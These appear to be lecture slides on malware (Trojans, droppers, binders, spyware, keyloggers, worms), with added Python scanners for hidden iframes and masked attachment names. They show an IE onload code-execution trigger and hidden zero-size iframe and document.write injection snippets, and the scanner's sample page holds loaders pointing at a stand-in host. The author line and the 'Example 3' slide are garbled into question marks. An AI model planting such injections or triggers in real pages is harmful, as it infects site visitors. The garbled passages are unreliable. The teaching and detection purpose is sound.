Title: The Attack and Defense of Computers
The Attack and Defense of Computers
- Dr. ? ? ?
Malicious Software (Malware)
- Security tools and toolkits
- Back doors (trap doors)
- Logic bombs
- Viruses
- Worms
- Binders
- Droppers
- Trojan Horses
- Bacteria or rabbit programs.
- Spyware
- Rootkit
- URL Injection
- Dialers
Security Tools and Toolkits
- Automatically scan for computer security weaknesses.
- Can be used by both security professionals and attackers.
- E.g. Nessus, COPS, ISS, Tiger, and so on.
- There are also programs and tool sets whose only function is to attack computers.
  - Script kids
- P.S. These tools may damage the systems that install them, or may contain booby traps that will compromise the systems that install them.
Logic Bombs
- A logic bomb is a piece of code intentionally inserted into a software system that sets off a malicious function when specified conditions are met.
- For example, a programmer may hide a piece of code that starts deleting files should he ever leave the company (and the salary database).
- Usually written by insider programmers.
Logic Bombs, Viruses and Worms
- Software that is inherently malicious, such as viruses and worms, often contains logic bombs that execute a certain payload at a pre-defined time or when some other condition is met.
- Many viruses attack their host systems on specific dates, such as Friday the 13th or April Fool's Day.
- Trojans that activate on certain dates are often called "time bombs".
Key Logger
- A program or hardware device that captures every key depression on the computer.
- Also known as "Keystroke Cops," they are used to monitor a user's activities by recording every keystroke the user makes, including typos, backspacing and retyping.
Security Concerns about Key Loggers
- Keystroke logging can be achieved by both hardware and software means.
- There is no easy way to prevent keylogging software from being installed on your PC, as it is usually done by stealth.
- If you are using a home PC, it is likely to be free of any keystroke logging hardware (but remember there may be keystroke logging software).
- Try to avoid typing private details on public PCs, and always try to avoid visiting sites on public PCs that require you to enter your login details, e.g. an online banking account.
Example
Dialers
- A program that
  - replaces the phone number in a modem's dial-up connection with a long-distance number, often out of the country, in order to run up phone charges on pay-per-dial numbers
  - dials out at night to send keylogger or other information to an attacker.
URL Injection
- Changes the URL submitted to a server belonging to some or all domains.
Bacteria and Rabbits
- Bacteria (also known as rabbit programs) are a type of malware that create many instances of themselves, or run many times simultaneously, in order to consume large amounts of system resources.
- Bacteria create a denial of service effect as legitimate programs may no longer be able to run, or at least may not run properly.
Definition of Binder
- A tool that combines two or more files into a single file, usually for the purpose of hiding one of them.
- A binder compiles the list of files that you select into one host file, which you can rename.
- A host file is a simple custom compiled program that will decompress and launch the embedded programs.
- When you start the host, the embedded files in it are automatically decompressed and launched.
Example
- When a Trojan is bound with Notepad, for instance, the result will appear to be Notepad, and appear to run like Notepad, but the Trojan will also be run.
Program
- YAB (Yet Another Binder)
- User Guide
Definition of a Dropper
- A dropper is a program (malware component) that has been designed to "install" some sort of malware (virus, backdoor, etc.) on a target system.
- Single stage: the malware code can be contained within the dropper in such a way as to avoid detection by virus scanners.
- Two stages: the dropper may download the malware to the target machine once activated.
Types of Droppers
- There are two major types of droppers:
  - those that do not require user interaction: they perform through the exploitation of a system by some vulnerability
  - those that require user interaction, by convincing the user that it is some legitimate or benign program.
Examples
Trojan Horse
- In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software.
- Trojans use false and fake names to trick users into executing them.
- These strategies are often collectively termed social engineering.
- A Trojan is designed to operate with functions unknown to the victim.
- The useful, or seemingly useful, functions serve as camouflage for these undesired functions.
Properties of Trojan Horses
- Trojan horse programs cannot operate autonomously, in contrast to some other types of malware, like worms.
- Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims.
- If Trojans replicate and even distribute themselves, each new victim must run the program/Trojan.
- Due to the above reasons, a Trojan horse's virulence depends on
  - successful implementation of social engineering concepts
- but doesn't depend on
  - the flaws in a computer system's security design or configuration.
Categories of Trojan Horses
- There are two common types of Trojan horses:
  - an otherwise useful piece of software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of
    - weather alerting programs
    - computer clock setting software
    - peer-to-peer file sharing utilities.
  - a standalone program that masquerades as something else, like a game or image file (e.g. firework.jpg.exe in Windows).
Malware Parasitizes inside Trojan Horses
- In practice, Trojan Horses in the wild often contain
  - spying functions (such as a packet sniffer)
  - backdoor functions that allow a computer, unbeknownst to the owner, to be remotely controlled from the network, creating a zombie computer.
- The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things.
- Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.
Example of a Simple Trojan Horse
- A simple example of a Trojan horse would be a program named waterfalls.scr.exe claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the computer.
E-Mail Trojan Horses
- On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file.
- The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif.
- Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse's extension might be "masked" by giving it a name such as Readme.txt.exe. With file extensions hidden, the user would only see Readme.txt and could mistake it for a harmless text file.
- Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.
Trojan Downloader (F-Secure, Microsoft)
- A Trojan downloader is usually a standalone program that attempts to secretly download and run other files from remote web and FTP sites.
- Usually Trojan downloaders
  - download different Trojans and backdoors
  - activate them on an affected system without the user's approval.
- A Trojan downloader, when run, usually installs itself to the system and waits until an Internet connection becomes available. After that it attempts to connect to a web or FTP site, download a specific file or files and run them.
Commonly Used Methods of Infection
- Websites (??).
- E-mails.
- Downloaded Files.
Websites
- You can be infected by visiting a rogue website.
- Internet Explorer is most often targeted by makers of Trojans and other pests, because it contains numerous bugs, some of which improperly handle data (such as HTML or images) by executing it as a legitimate program.
- Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.
- The more "features" a web browser has (for example ActiveX objects, and some older versions of Flash or Java), the higher your risk of having security holes that can be exploited by a Trojan horse.
Example 1: Microsoft IE window() Arbitrary Code Execution Vulnerability (Secunia)
- The vulnerability is caused by certain objects not being initialized correctly when the window() function is used in conjunction with the <body onload> event.
- This can be exploited to execute arbitrary code on a vulnerable browser via specially crafted JavaScript code called directly when a site has been loaded.
- Example: <body onload="window()">
- Successful exploitation requires that the user is e.g. tricked into visiting a malicious website.
- PROOF OF CONCEPT
Explanation (Computer Terrorism)
<body onLoad> (HTML Code Tutorial)
- The browser triggers onLoad when the document is finished loading. The contents of onLoad is one or more JavaScript commands. So, for example, the following <body ...> tag tells the browser to bring up an alert box once the page is completely loaded:
- <BODY onLoad="alert('hello world!')">
MS IE - Crash on JavaScript window() Calling (1)
- There is a bug in Microsoft Internet Explorer which causes it to crash.
- The bug occurs because Microsoft Internet Explorer can't handle a call to a JavaScript function with the name of the "window" object.
- window: an object used in JavaScript.
MS IE - Crash on JavaScript window() Calling (2) (Symantec)
- Internet Explorer fails to properly initialize the JavaScript 'Window()' function. When the 'onLoad' handler is set to call the improperly initialized 'Window()' function, the Web browser attempts to call the address 0x006F005B, which is derived from the Unicode representation of 'OBJECT'.
  - CALL DWORD [ECX+8]
- It is shown that JavaScript prompt boxes can be used by attackers to fill the memory region at 0x00600000 with attacker-supplied data, allowing executable machine code to be placed into the required address space.
  - Crash, if pointing to non-code.
  - Execution, if pointing to code.
Dangerous Web Site
- The web site pointed to by the following URL is one containing the trap described in the previous slides.
- HTTP MSIE JavaScript OnLoad Rte CodeExec (Symantec)
- http://marc.theaimsgroup.com/?l=bugtraq&m=111746394106172&w=2
Example 2: Trojan Horse Exploits Image Flaw (Declan McCullagh et al.)
- EasyNews, a provider of Usenet newsgroups, said it has identified two JPEG images that take advantage of a previously identified flaw (a heap-based buffer overflow, Michael Cobb) in the way Microsoft software handles graphics files.
- Windows users could have their computers infected merely by opening one of those Trojan horse images.
- Attackers tried to use these JPEGs to download Trojan (horse programs) to vulnerable computers.
Example 3: Compromise a Web Server and Add Hidden Download Instructions in Web Pages
- Create a frame with size 0.
- ?????
- ??
- SQL Injection
- ?
- ???? ?
- ?????,?????? ????????? ?? ??????? .
????
- ???????
- <iframe src=???? width=0 height=0></iframe>
JScript ????
- ?????????? xxx.js ??????????????????
- document.write("<iframe width='0' height='0' src='????'></iframe>")
- ??JScript ??????
- ???????
- <script language=javascript src=xxx.js></script>
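As an added example (not part of the original slides), the following Python scanner flags the hidden-download tricks shown in the last few slides: a zero-size iframe, an iframe written via document.write, and a script tag pulling JavaScript from another host. The page URL and the sample HTML are constructed for this example.

```python
"""Added example (not from the original slides): scan a page for the hidden
download tricks shown above: a zero-size iframe, an iframe written by
document.write, and a <script src> that pulls JavaScript from another host."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


def _is_zero(value):
    """True for 0, '0', "0px", "0%" and similar sizes that make a frame invisible."""
    return value is not None and value.strip().strip("'\"").lower().rstrip("pxt%").strip() == "0"


class InjectionScanner(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlparse(page_url).netloc.lower()
        self.findings = []          # list of (kind, src) pairs, in page order
        self._script_buf = None     # text of the <script> currently being read

    def _off_site(self, src):
        """Does src resolve to a host other than the page's own?"""
        host = urlparse(urljoin(self.page_url, src)).netloc.lower()
        return host != "" and host != self.page_host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src")
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = ((_is_zero(a.get("width")) and _is_zero(a.get("height")))
                      or "display:none" in style or "visibility:hidden" in style)
            if hidden and src:
                self.findings.append(("hidden-iframe", src))
        elif tag == "script":
            if src and self._off_site(src):
                self.findings.append(("remote-script", src))
            self._script_buf = []   # HTMLParser delivers script text via handle_data

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            text = "".join(self._script_buf)
            self._script_buf = None
            # The document.write("<iframe width='0' height='0' src=...>") variant
            if "document.write" in text and "<iframe" in text.lower():
                m = re.search(r"src\s*=\s*['\"]?([^'\"\s>]+)", text, re.I)
                self.findings.append(("script-written-iframe", m.group(1) if m else "?"))


def scan_html(html, page_url):
    """Return the suspicious (kind, src) pairs found in html, in page order."""
    scanner = InjectionScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a normal page into which three hidden loaders were added.
SAMPLE_HTML = """<html><body>
<script src="/js/site.js"></script>
<iframe src="https://partner.example.org/widget" width="300" height="200"></iframe>
<iframe src="http://bad.example.net/x.htm" width="0" height="0"></iframe>
<script>document.write("<iframe width='0' height='0' src='http://bad.example.net/y.htm'></iframe>")</script>
<script language="javascript" src="http://bad.example.net/xxx.js"></script>
</body></html>"""

if __name__ == "__main__":
    for kind, src in scan_html(SAMPLE_HTML, "https://www.example.com/index.html"):
        print(f"{kind}: {src}")
```

Run over a page fetched from a server you administer, the three kinds of findings point at the exact lines to remove and at the remote hosts to block; the visible partner iframe and the same-site script are deliberately not reported.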
Emails and Trojan Horses
- The majority of Trojan horse infections occur because the user was tricked into running an infected program.
- This is why you're not supposed to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a Trojan or virus.
Microsoft Outlook
- If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly.
- The same vulnerabilities exist since Outlook allows email to contain HTML and images (and actually uses much of the same code to process these as Internet Explorer).
Downloaded Files
- The infected program doesn't have to arrive via email, though it can be
  - sent to you in an Instant Message
  - downloaded from a Web site or by FTP
  - delivered on a CD or floppy disk
Precautions against Trojan Horses (1)
- Trojan Horses are commonly spread through e-mail, much like other types of common viruses. The only difference, of course, is that a Trojan Horse is hidden.
- The best ways to protect yourself and your company from Trojan Horses are as follows:
  - If you receive e-mail from someone that you do not know or you receive an unknown attachment, never open it right away.
  - As an e-mail user you should confirm the source.
  - Some hackers have the ability to steal address books, so if you see e-mail from someone you know that does not necessarily make it safe.
Precautions against Trojan Horses (2)
- When setting up your e-mail client, make sure that your settings do not open attachments automatically.
- Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened.
- If your client does not come with this, it would be best to purchase one or download one for free.
- Make sure your computer has an anti-virus program on it and make sure you update it regularly.
- If you have an auto-update option included in your anti-virus program you should turn it on; that way, if you forget to update your software you can still be protected from threats.
Precautions against Trojan Horses (3)
- Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses.
- Software developers like Microsoft offer patches that in a sense close the hole that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches your computer is kept much safer.
- Avoid using peer-to-peer or P2P sharing networks like Kazaa, Limewire, Ares, or Gnutella because
  - those programs are generally unprotected from Trojan Horses
  - Trojan Horses are especially easy to spread through these programs
  - some of these programs do offer some virus protection but often it is not strong enough.
Precautions against Trojan Horses (4)
- NEVER download blindly from people or sites which you aren't 100% sure about.
- However, legitimate web sites may be compromised by attackers who modify web pages to contain scripts that download malware.
- Even if the file comes from a friend, you still must be sure what the file is before opening it. (Ask your friend whether she/he sent the file to you.)
- Beware of hidden file extensions (under Windows, susie.jpg.exe is only shown as susie.jpg).
- Never use features in your programs that automatically get or preview files (Outlook preview mode).
- Never blindly type commands that others tell you to type, or go to web sites mentioned by strangers.
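The hidden-extension trick appears twice above (Readme.txt.exe in "E-Mail Trojan Horses" and susie.jpg.exe in this slide). As an added example that is not part of the original slides, the Python below screens attachment names for it before a user sees them; the extension set starts from the ones the slides list, and the sample names are constructed.

```python
"""Added example (not from the original slides): screen attachment names for
the hidden-extension trick (Readme.txt.exe, susie.jpg.exe). Extension sets and
sample names are constructed; the executable set starts from the slides."""
import os

# Extensions Windows treats as programs (.exe, .com, .scr, .bat, .pif from the
# slides, plus a few common script and installer types).
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".bat", ".pif",
                   ".cmd", ".vbs", ".js", ".hta", ".msi"}


def displayed_name(filename):
    """What Explorer shows when 'Hide extensions for known file types' is on:
    only the last extension is hidden, so Readme.txt.exe appears as Readme.txt."""
    root, ext = os.path.splitext(filename)
    return root if ext else filename


def classify(filename):
    """Return (verdict, reason) for one attachment name.

    block      - executable whose real extension hides behind a decoy one
    quarantine - plainly executable attachment (setup.exe)
    allow      - anything else
    """
    name = filename.strip().lower()
    root, ext = os.path.splitext(name)
    if ext not in EXECUTABLE_EXTS:
        return ("allow", "")
    # Padding spaces ("photo.jpg      .exe") push the real extension out of a
    # narrow column, so strip them before looking for the decoy extension.
    _, decoy = os.path.splitext(root.rstrip())
    if decoy and decoy[1:].isalpha():
        shown = displayed_name(filename)
        return ("block", f"{ext} executable masked as {decoy}; user would see '{shown}'")
    return ("quarantine", f"executable attachment ({ext})")


def screen_attachments(names):
    """Classify a batch of names; returns {name: (verdict, reason)}."""
    return {n: classify(n) for n in names}


# Constructed sample attachment names, including the ones from the slides.
SAMPLE_ATTACHMENTS = [
    "Readme.txt.exe",        # masked as a text file
    "susie.jpg.exe",         # masked as an image
    "waterfalls.scr.exe",    # the "screensaver" from the simple Trojan example
    "firework.jpg.exe",
    "photo.jpg      .exe",   # padded to push .exe out of view
    "setup.exe",             # honest executable
    "report-v1.2.pdf",
    "archive.tar.gz",
]

if __name__ == "__main__":
    for name, (verdict, reason) in screen_attachments(SAMPLE_ATTACHMENTS).items():
        print(f"{verdict:10s} {name!r:28s} {reason}")
```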
Well-known Trojan Horses
- Back Orifice
- Back Orifice 2000
- Beast Trojan
- NetBus
- SubSeven
- Downloader-EV
- Pest Trap
- flooder
- Tagasaurus
- Vundo trojan
- Gromozon Trojan
Experiment
- Survey some Trojan horses to see what approaches they adopt to fool a user into executing them.
List of Trojan Horses
- http://en.wikipedia.org/wiki/List_of_trojan_horses
A Large Number of Toolbars, Some Added by Spyware, Overwhelm an IE Session
Some Statistics about Spyware (A. Moshchuk et al.)
- A recent scan (2005) performed by AOL/NCSA of 329 customers' computers found that 80% were infected with spyware programs.
- Each infected computer contained an average of 93 spyware components.
Definition of Spyware
- Spyware is computer software that is installed surreptitiously on a personal computer to
  - monitor
  - intercept
  - or
  - take partial control over
- the user's interaction with the computer, without the user's informed consent.
Activities of Spyware
- Spyware programs can
  - secretly monitor the user's behavior and then send this information to a hacker over the Internet
  - collect various types of personal information
  - interfere with user control of the computer in other ways, such as
    - installing additional software
    - redirecting Web browser activity
    - diverting advertising revenue to a third party.
Spyware Functions (A. Moshchuk et al.)
Types of Information Collected by Spyware
- Spyware can collect many different types of information about a user.
- More benign programs can attempt to track what types of websites a user visits and send this information to an advertisement agency.
- More malicious versions can try to record what a user types to try to intercept passwords or credit card numbers.
- Yet other versions simply launch pop-ups with advertisements.
OSes vs. Spyware
- As of 2006, spyware has become one of the pre-eminent security threats to computer systems running Microsoft Windows OSes.
- Some malware on the Linux and Mac OS X platforms has behavior similar to Windows spyware, but to date has not become anywhere near as widespread.
Spyware Certification
- The Spyware-Free Certification program evaluates software to ensure that the program does not install or execute any form of malicious code.
Typical Tactics Adopted by Spyware
- Delivery of unsolicited pop-up advertisements.
- Monitoring of Web-browsing activity for marketing purposes.
- Theft of personal information.
Adware
- The term adware frequently refers to any software which displays advertisements, whether or not it does so with the user's consent.
- Programs such as the Eudora mail client display advertisements as an alternative to shareware registration fees.
- These classify as "adware" in the sense of advertising-supported software, but not as spyware.
- Adware in this form does not operate surreptitiously or mislead the user, and provides the user with a specific service.
Spyware and Pop-up Ads
- Spyware displays advertisements related to what it finds from spying on you, not the ones posted by advertisers.
- Claria Corporation's Gator software and Exact Advertising's BargainBuddy provide examples of this sort of program.
- Visited Web sites frequently install Gator on client machines in a surreptitious manner, and it directs revenue to the installing site and to Claria by displaying advertisements to the user. The user experiences a large number of pop-up advertisements.
Pop-up Ads
- Pop-up ads or popups are a form of online advertising on the World Wide Web.
- It works when certain web pages open a new web browser window to display advertisements.
- The pop-up window containing an advertisement is usually generated by JavaScript, but can be generated by other means as well.
Pop-under Ads
- A variation on the pop-up window is the pop-under advertisement. This opens a new browser window behind the active window.
- Pop-unders interrupt the user less, but are not seen until the desired windows are closed, making it more difficult for the user to determine which Web page opened them.
Dozens of Pop-up Ads Cover a Desktop.
Web Activity Monitor
- Other spyware behavior, such as reporting on websites the user visits, frequently accompanies the displaying of advertisements.
- Monitoring web activity aims at building up a marketing profile on users in order to sell "targeted" advertisement impressions.
Other Victims of Spyware
- The prevalence of spyware has cast suspicion upon other programs that track Web browsing, even for statistical or research purposes.
- Some observers describe the Alexa Toolbar, an Internet Explorer plug-in published by Amazon.com, as spyware (and some anti-spyware programs report it as such) although many users choose to install it.
Identity Theft and Fraud
- Some spyware is closely associated with identity theft.
- Spyware may transmit the following information to attackers:
  - chat sessions,
  - user names,
  - passwords,
  - bank information, etc.
- Spyware has principally become associated with identity theft in that keyloggers are routinely packaged with spyware.
- John Bambenek, who researches information security, estimates that identity thieves have stolen over 24 billion US dollars of account information in the United States alone.
Routes of Infection
- Spyware does not directly spread in the manner of a computer virus or worm: generally, an infected system does not attempt to transmit the infection to other computers.
- Instead, spyware gets on a system
  - through deception of the user
  - or
  - through exploitation of software vulnerabilities.
Masquerade
- One way of distributing spyware involves tricking users by manipulating security features designed to prevent unwanted installations.
Masquerade - Example
- The Internet Explorer Web browser, by design, prevents websites from initiating an unwanted download.
- Instead, a user action (such as clicking on a link) must normally trigger a download.
- However, links can prove deceptive. For instance,
  - A pop-up ad may appear like a standard Windows dialog box.
  - The box contains a message such as "Would you like to optimize your Internet access?" with links which look like buttons reading Yes and No.
  - No matter which "button" the user presses, a download starts, placing the spyware on the user's system.
A Masquerade Example
- Malicious websites may attempt to install spyware on readers' computers.
- In this screenshot a website has triggered a pop-up that offers spyware in the guise of a security upgrade.
Bundled with Shareware
- Spyware can also come bundled with
  - shareware
  - other downloadable software
  - music CDs.
- The user downloads a program (for instance, a music program or a file-trading utility) and installs it, and the installer additionally installs the spyware. Although the desirable software itself may do no harm, the bundled spyware does.
- In some cases, spyware authors have paid shareware authors to bundle spyware with their software.
- In other cases, spyware authors have repackaged desirable free software with installers that add spyware.
Bundled Shareware Example
- The BearShare file-trading program, "supported" by WhenU spyware.
- In order to install BearShare, users must agree to install "the SAVE! bundle" from WhenU.
- The installer provides only a tiny window in which to read the lengthy license agreement. Although the installer claims otherwise, the software transmits users' browsing activity to WhenU servers.
Through Trojan Horse
- Classically, a Trojan horse, by definition, smuggles in something dangerous in the guise of something desirable. Some spyware programs get spread in just this manner.
- The distributor of spyware presents the program as a useful utility, for instance as a Web accelerator or as a helpful software agent.
- Users download and install the software without immediately suspecting that it could cause harm.
Vulnerabilities in Web Browsers
- Some spyware authors infect a system by attacking security holes
  - in the Web browser
  - or
  - in other software.
- When the user navigates to a Web page controlled by the spyware author, the page contains code which attacks the browser and forces the download and install of spyware.
- Common browser exploits target security vulnerabilities in Internet Explorer and in the Microsoft Java runtime.
Notable Programs Distributed with Spyware
- Messenger Plus! (only if you agree to install their "sponsor" program)
- Bearshare
- Bonzi Buddy
- DAEMON Tools (only if you agree to install their "sponsor" program)
- DivX (except for the paid version, and the "standard" version without the encoder). DivX announced removal of GAIN software from version 5.2.
- Dope Wars
- ErrorGuard
- FlashGet (free version)
- Grokster
- Kazaa
- Morpheus
- RadLight
- WeatherBug
- EDonkey2000
Worms
- Worms spread themselves by proactively attacking programs with specific vulnerabilities.
- The most frequently used attack approaches include buffer overflow attacks, format string attacks, integer overflow attacks, and so on.
- Morris Worm, 1988
- Code Red, Slammer.
Comparisons between Viruses, Trojan Horses, and Worms
- The way they behave
- How are they triggered?
- How do they spread?
- Do they need host programs?